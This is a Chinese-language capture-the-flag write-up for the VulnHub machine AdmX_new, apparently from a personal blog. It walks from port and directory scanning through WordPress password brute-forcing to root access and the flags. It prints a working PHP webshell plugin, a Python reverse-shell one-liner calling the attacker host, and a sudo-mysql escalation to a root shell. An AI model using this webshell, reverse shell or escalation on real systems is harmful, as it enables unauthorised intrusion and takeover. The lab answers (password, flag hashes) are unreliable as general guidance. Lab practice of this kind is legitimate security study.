[VulnHub] - AdmX_new

靶机地址: https://download.vulnhub.com/admx/AdmX_new.7z
难度等级: 中
打靶目标: 取得 2 个 flag + root 权限
靶机ip:192.168.56.107
攻击ip：192.168.56.106
问题：
靶机导入virtualbox后，启动靶机，在kali上无法发现靶机的ip地址。

1.无法获取地址：

启动页面按e，进入编辑模式，并将下面位置的内容修改为rw single init=/bin/bash,同时将后面的内容删除，ctrl+x进入单一用户模式

ip add看到网卡进行修改

##配置网卡信息
vi /etc/netplan/00-installer-config.yaml

保存，重启系统。

2.主机发现

端口扫描，发现只开启了80 端口

WEB路径爆破

#安装feroxbuster
sudo apt install feroxbuster -y
#由于feroxbuster本身没有内建目录字典，需要调用seclists中的字典
sudo apt install seclists -y
#使用feroxbuster对靶机进行目录扫描，
feroxbuster --url http://10.0.2.6
#扫了100年后,发现貌似扫描到了
/tools/                                                                                                  
/wordpress/                                                                                              
/wordpress/wp-content/                                                                                   
/wordpress/feed/                                                                                         
/wordpress/wp-admin/   等多个目录
/wordpress/wp-login.php

经过一番搜寻，未曾发现主页有可用的信息

出现了wordpress，那么可以猜测这个网站是一个wordpress的cms搭建的，拼接tools访问，没有权限；凭借wordpress访问，发现的页面不像一个cms所拥有的页面，而且访问速度很慢；

发现数据包对192.168.159.145行一个访问，访问的内容都是关于wordpress的一些js文件，而192.168.159.145不存在，发现网站可能是重定向。

BurpSuite内容替换

会不会是之前在编写代码的时候，靶机的ip为192.168.159.145，但是现在靶机的ip改了，使用burp进行替换，将数据包的192.168.159.145换成192.168.56.107，需要将response响应头和请求体都替换。

3.密码爆破，Wordpress后台漏洞利用

#爆破得到用户admin密码adam14
http://192.168.56.107/wordpress/wp-login.php

4.MSF漏洞利用

我这个无法使用

5.通过插件反弹shell

写一个webshell压缩成zip的形式

<?php
/**

 * Plugin Name: Webshell
 * Plugin URI: https://www.cnblogs.com/23xie
 * Description: WP Wehshell for Pentest
 * Version: 1.0
 * Author: yuanfh
 * Author URI: https://www.cnblogs.com/23xie
 * License: https://www.cnblogs.com/23xie
   */

if(isset($_GET['cmd']))
        {
                system($_GET['cmd']);
        }

?>

通过搜索得知文件夹的路径是/wp-content/plugins，就此对这个页面进行拼接，http://192.168.56.107/wp-content/plugins/shell.php?cmd=id

反弹shell连接

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.106",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

6.升级Full TTY终端

通过python反弹的shell，无法使用vi等命令对文本文件进行编辑，此时需要将shell升级成功能完整的、可以实现交互式的shell(此shell升级只适用于BASH)

先将kali主机的解释器修改为BASH,先查看当前kali的解释器是否为BASH，若不是需要修改为BASH

ctrl+z终止

CTRL+Z
stty raw -echo
fg
CTRL+Z
echo $SHELL
chsh -s /bin/bash             #修改解释器为BASH#ls
reboot  					   #修改完成后需要重启
export SHELL=/bin/bash
export TERM=screen
stty rows 38 columns 116
reset
将当前shell升级为完整的shell终端

7.蚁剑上线

7.提权

在home目录下发下了第一个txt，但是提示我们没有权限，看到了wpadmin 在之前提示我们，txt需要这个用户才能打开

同时在wp-config.php发现了数据库的用户和密码


从而得到flag和root权限

padmin@wp:~$ cat local.txt                                                                                                                                                                       
153495edec1b606c24947b1335998bd9 

root@wp:~# cat proof.txt 
7efd721c8bfff2937c66235f2d0dbac1

总结：在开始时我们发现开启nmap扫描，只发现靶机开启了一个80的服务，从而通过目录扫描发现wordpress的若干个目录结构，当我们尝试访问这个192.168.56.107/worepress目录的时候，发现这个目录非常的慢，通过代码审计发现，原来的主机和192.168.159.145这个地址绑定了，这时候我们不得不去考虑去替换这个地址的相应报文为我们靶机的ip，通过这一修改，我们成功的看到了正常的页面，从而在Wordpress这个页面中，通过暴力破解得到密码为adam14,登录网页，发现插件可以上传，从而获得到反弹的shell，通过这个反弹shell，我们获取到的主机权限非常的低，并不支持我们能打开local.txt这个文档，提示需要wpadmin用户才可以，同时我们有进行了有效的的信息收集，发现wp-config.php存在的mysql的用户名和密码，但是显示不对，从而我们使用su wpadmin登录发现这个密码和网页的一样，adam14，登录成功，看到了我们的第一个falg，接着使用sudo -l 查看，显示我们不需要密码就可以登录这个mysql数据库，但是这个依然是adam14,从而登录到了数据库，并且使用system id查看了可以获取root的权限，接着我们利用mysql这一信息，! /bin/bash,成功拿到了root的权限，并且成功查看到了root下的flag，自此实验结束。